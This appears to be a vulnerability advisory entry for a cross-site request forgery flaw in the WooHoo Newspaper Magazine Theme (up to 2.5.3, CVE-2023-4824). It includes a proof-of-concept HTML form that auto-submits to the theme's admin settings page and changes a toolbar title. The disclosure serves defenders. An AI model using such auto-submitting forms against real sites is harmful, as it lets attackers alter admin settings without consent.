Lucene search
Bob MatyasWPEX-ID:71C616FF-0A7E-4F6D-950B-79C469A28263HistoryOct 27, 2023 - 12:00 a.m.
WooHoo Newspaper Magazine Theme <= 2.5.3 - Settings Update via CSRF
2023-10-2700:00:00
Bob Matyas
31
csrf
woohoo newspaper
magazine theme
settings update
admin
html
page
plugin
toolbar options
title
exploit
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Make an admin open an HTML page with the following HTML:
```
<form action="https://wps-test.ddev.site/wp-admin/admin.php?page=mypanel&do=submit" method="POST">
<input type="text" name="bdaia_t_title" value="CSRF Title">
</form>
<script> document.forms[0].submit(); </script>
```
See that the plugin's "Header Options > Toolbar Options > Title" has been updated to `CSRF Title`Related
cvelist
cvelist
nvd
nvd
CVE-2023-4824
2023-11-20 19:15:09
cve
cve
CVE-2023-4824
2023-11-20 19:15:09
prion
prion
Cross site request forgery (csrf)
2023-11-20 19:15:00
wpvulndb
wpvulndb
WooHoo Newspaper Magazine Theme <= 2.5.3 - Settings Update via CSRF
2023-10-27 00:00:00
7.2 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
24.3%
Related for WPEX-ID:71C616FF-0A7E-4F6D-950B-79C469A28263